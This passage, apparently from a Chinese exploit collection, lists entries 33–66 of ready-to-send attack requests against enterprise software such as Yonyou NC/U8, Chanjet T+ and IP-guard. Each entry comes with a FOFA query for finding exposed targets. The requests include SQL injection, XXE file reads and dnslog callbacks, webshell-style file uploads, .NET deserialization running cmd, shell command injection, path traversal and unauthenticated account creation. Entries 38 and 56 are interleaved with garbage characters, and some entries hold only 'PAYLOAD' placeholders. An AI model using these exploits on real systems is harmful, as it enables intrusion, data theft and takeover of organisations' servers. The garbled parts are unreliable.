User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

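Entries 26 through 34 all rest on the same indicator: a five-second sleep injected through waitfor delay (SQL Server) or DBMS_PIPE.RECEIVE_MESSAGE (Oracle). One slow response is weak evidence, because a loaded NC portal can take five seconds on its own. The Python below is an added example, not code from the original article or from Yonyou. It measures a benign baseline, then requests two different delays over several rounds and reports injection only when the extra latency tracks the requested delay every time. The request sender and the clock are injected, so the logic runs offline against make_fake_target(), a simulated server written for this demo; the linkVoucher URL template is an assumed placeholder in the page's own x.x.x.x style.

```python
"""Confirm a time-based blind SQL injection indicator of the kind used in
the Yonyou NC entries above. Added example, not part of the original
article. `send` is an assumed callable (url) -> None that performs the
request; `clock` returns seconds; make_fake_target() is a simulated server
for offline use only."""
import re
import time
from urllib.parse import quote, unquote


def mssql_delay_payload(seconds):
    # Same shape as the page's SQL Server payloads: 1'waitfor delay '0:0:N'--
    return f"1'waitfor delay '0:0:{seconds}'--"


def oracle_delay_payload(seconds):
    # Same shape as the page's Oracle payloads
    return f"1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{seconds})--"


def timed(send, url, clock):
    """Seconds one request took, measured with the supplied clock."""
    t0 = clock()
    send(url)
    return clock() - t0


def confirm_time_based_sqli(url_template, send, payload_fn=mssql_delay_payload,
                            clock=time.monotonic, delays=(2, 5), rounds=2,
                            tolerance=1.0):
    """True only if every delayed request costs baseline + requested delay
    (within `tolerance` seconds). `url_template` has one {payload} slot."""
    baseline = min(timed(send, url_template.format(payload=quote("1")), clock)
                   for _ in range(rounds))
    for _ in range(rounds):
        for seconds in delays:
            url = url_template.format(payload=quote(payload_fn(seconds)))
            extra = timed(send, url, clock) - baseline
            if abs(extra - seconds) > tolerance:
                return False  # latency does not follow the requested sleep
    return True


def make_fake_target(vulnerable, base_latency=0.4):
    """Simulated server (constructed for the demo): a fake clock advanced by
    `base_latency` per request, plus the delay the payload asks for when the
    target is `vulnerable`."""
    state = {"now": 0.0}
    delay_re = re.compile(r"0:0:(\d+)|RECEIVE_MESSAGE\([^,]+,(\d+)\)", re.I)

    def clock():
        return state["now"]

    def send(url):
        state["now"] += base_latency
        m = delay_re.search(unquote(url))
        if vulnerable and m:
            state["now"] += int(m.group(1) or m.group(2))

    return send, clock


# Assumed placeholder URL for entry 26; pkBill is the injected parameter.
LINKVOUCHER = "http://x.x.x.x/portal/pt/yercommon/linkVoucher?pageId=login&pkBill={payload}"


def run_demo(vulnerable, base_latency=0.4, payload_fn=mssql_delay_payload):
    """Run the check against a simulated target and return its verdict."""
    send, clock = make_fake_target(vulnerable, base_latency)
    return confirm_time_based_sqli(LINKVOUCHER, send, payload_fn, clock=clock)


if __name__ == "__main__":
    print("vulnerable target:", run_demo(True))
    print("slow but not injectable target:", run_demo(False, base_latency=6.0))
```

Against a real host, swap make_fake_target() for a send() built on requests or urllib with a timeout comfortably above the largest delay, and keep the tolerance at or above the server's observed jitter; a patched but slow server fails the check because its extra latency stays flat instead of scaling with the requested sleep.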
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE- s( G, C v7 L, b' b! _9 o
FOFA:app="用友-U8-Cloud"% Q1 w* G( {" x: |% T7 k. Y
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 z' M' Z- u7 B# J9 ?! J
Host: 192.168.40.131:8088( H/ V6 C: @; @7 W% W, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25: N, {( K3 o5 U% u
Content-Length: 260) |8 m! M E8 E: [! M! r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 {2 V) ~+ O* O C* B7 c* R8 MAccept-Encoding: gzip, deflate
' W5 P8 m) x* t- N# q4 lAccept-Language: zh-CN,zh;q=0.9! d) h4 r8 h% G* ^: J& B! u+ M
Connection: close
7 C' F2 ~2 D) H8 [! ]' O. hContent-Type: application/x-www-form-urlencoded8 c# m/ n5 o. e. u
7 D2 F2 i- P/ n
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>6 u- S0 B& x( ]
# y( K$ V- c( G2 C
39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud (government finance cloud) arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(The only request given for this entry is the path-traversal read of /etc/passwd above; no upload request is shown.)

54. Chanjet (畅捷通) T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. The command it runs writes the given string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: request the following URL (the file written in step 1):
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

/ ?! G4 t/ C$ Z1 R+ R56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 q2 S% i* o1 e5 i5 _( f4 S: I6 Y
FOFA: app="畅捷通-TPlus"$ ]$ Y: Y: u* q# B5 R7 k
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1! y% }' e2 r; M- L
Host: x.x.x.x: X0 Q. z3 I4 s( s: _5 u: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 P C! n8 I- U3 {% Z" \# I) R9 nContent-Type: application/json6 L& Z" E; T2 u- B
0 |( J( M) L* B5 m0 Z; o& m- O
{% D+ r/ y+ S! s/ m8 ^
"storeID":{
: ?! J, E. K V; T6 n0 D "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 S8 {8 W- k2 E0 s) o, T" j: g# p
"MethodName":"Start",. K& j: r- o3 z, |6 C* q G
"ObjectInstance":{2 {4 m& ?. a2 D: m
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 H9 E1 S9 v' a# n' E2 ^ T+ c4 X "StartInfo": {* G) t9 ], y3 o& j* M( C. \: G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ C1 b6 O5 C9 R: l Q- }/ g "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"7 s4 M2 ?( h( f
}2 i0 x0 `& f' z% Z! A; m' j% O
}* v4 M: O: s2 E
}! F N4 Z Y( X2 L) W
}
" R, g: N. t% V
8 E/ P6 @) {) J' G m
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, and type=exportexcelbysql makes the endpoint export the query result.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The filename parameter names the file written (a .jsp here) and the 27-byte request body becomes its content.
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
The page parameter is concatenated into a shell command; ||echo ... > file writes a marker file next to view.php.
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the marker file to confirm:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
The path parameter is not canonicalised, so ..%2Fconfig.ini walks out of the download directory and returns the configuration file.
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
Time-based: the sId element of the GetOSpById SOAP call is concatenated into the query, so waitfor delay '0:0:5' delays the response by about 5 seconds on a vulnerable host. Compare against the round-trip time of a benign sId before concluding anything.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lian'ai Cloud (脸爱云) one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function is reachable without a session. A 200 response means the operator account test123456 / 123456 has been created. This check is not side-effect free: it leaves a real account behind, so delete it afterwards. visible_jh and visible_dorm carry the URL-encoded placeholder 请选择 ("please select").
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

